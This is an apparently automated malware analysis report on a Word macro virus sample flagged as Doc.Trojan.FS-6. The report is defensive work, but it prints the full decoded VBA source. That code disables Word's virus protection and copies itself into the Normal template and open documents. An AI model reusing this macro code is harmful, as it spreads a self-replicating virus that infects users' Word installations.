Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1df654e93737a075…

MALICIOUS

Office (OLE)

Size: 27.0 KB
Created: 1999-08-05 06:12:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 422ac9a7c4dc96f4f191ac85d45edb5b
SHA-1: 118d374a420c78bf182a15c871d6e28eb78ee2cf
SHA-256: 1df654e93737a075c7ea15080d3b2c0b2915eb14aa02be34694266a337974af8
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1505.003 Server Software Component: Visual Basic for Applications

The sample is a Word document containing VBA macros. The macros attempt to infect the Normal template by exporting and then importing a component named 'Mscreate.dir'. This technique is commonly used by macro-based malware to establish persistence or spread to other documents. The ClamAV detection 'Doc.Trojan.FS-6' further supports the malicious nature of the file.

Heuristics (2)

  • ClamAV: Doc.Trojan.FS-6 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.FS-6
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1029 bytes
SHA-256: 324293011284c356d2397c00e849052517c14f129f50617e9910b47dcaa2305e
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Quote
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
WordBasic.DisableAutoMacros 0
Application.ScreenUpdating = 0
Application.EnableCancelKey = 0
ι = Application.StartupPath & "\Mscreate.dir"
If GetAttr(ι) <> 34 Then SetAttr ι, 0: VBProject.VBComponents(1).Export ι: SetAttr ι, 34
With ActiveDocument.VBProject
If .HelpContextID <> 1 Then _
.HelpContextID = 1: _
.VBComponents(1).CodeModule.AddFromFile ι: _
.VBComponents(1).CodeModule.DeleteLines 1, 4
End With
With NormalTemplate.VBProject
If .HelpContextID <> 1 Then _
.HelpContextID = 1: _
.VBComponents(1).CodeModule.AddFromFile ι: _
.VBComponents(1).CodeModule.DeleteLines 1, 4
End With
End Sub